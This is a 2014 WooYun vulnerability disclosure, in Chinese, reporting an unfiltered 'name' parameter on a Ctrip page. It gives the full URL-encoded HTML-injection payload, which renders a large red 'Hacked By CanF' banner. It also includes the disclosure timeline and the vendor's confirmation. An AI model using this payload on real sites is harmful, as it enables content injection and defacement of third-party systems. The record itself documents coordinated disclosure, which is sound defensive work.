漏洞概要关注数(6)关注此漏洞

漏洞概要
关注数(
6
)
关注此漏洞
缺陷编号：
WooYun-2014-85054
漏洞标题：		我是如何发现携程主站url参数未过滤漏洞的
相关厂商：
携程旅行网
漏洞作者：
残废
提交时间：		2014-11-28 11:01
公开时间：		2015-01-12 11:02
漏洞类型：		xss跨站脚本攻击
危害等级：		中
自评Rank：		10
漏洞状态：		
															厂商已经确认
漏洞来源：
http://www.wooyun.org
Tags标签：
xss利用技巧
0
人收藏
收藏
分享漏洞：
漏洞详情
披露状态：
2014-11-28：	细节已通知厂商并且等待厂商处理中
2014-11-28：	厂商已经确认，细节仅向厂商公开
2014-12-08：	细节向核心白帽子及相关领域专家公开
2014-12-18：	细节向普通白帽子公开
2014-12-28：	细节向实习白帽子公开
2015-01-12：	细节向公众公开
简要描述：
主站的XSS  Waf没绕过   就证明个自定也页内容吧   携程主站是asp的我也是醉了
详细说明：
本来碰到个主站的XSS
结果没绕过waf
code 区域
http://www.ctrip.com/Community/action/08Photo/who.asp?name=
这个地方
贴上payload
code 区域
http://www.ctrip.com/Community/action/08Photo/who.asp?name=%22%2F%3E%3Cdiv%3E%3Cdiv+style%3D%22+width%3A1000px%3B+height%3A1000px%3B+position%3Aabsolute%3B+top%3A50%25%3B+left%3A50%25%3B+margin-left%3A-400px%3B+margin-top%3A-250px%3B+background%3Ared%3B;font-size:2cm;%22%3EHacked%20By%20CanF%3C%2Fdiv%3E
漏洞证明：
修复方案：
过滤用户输入的字符串
版权声明：转载请注明来源
残废
@
乌云
漏洞回应
厂商回应：
危害等级：低
漏洞Rank：3
确认时间：2014-11-28 11:05
厂商回复：
额，漏洞确实存在，已经通知开发人员进行修复。
谢谢您的提交。
最新状态：
暂无
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价
(共
0
人评价)
:
登陆后才能进行评分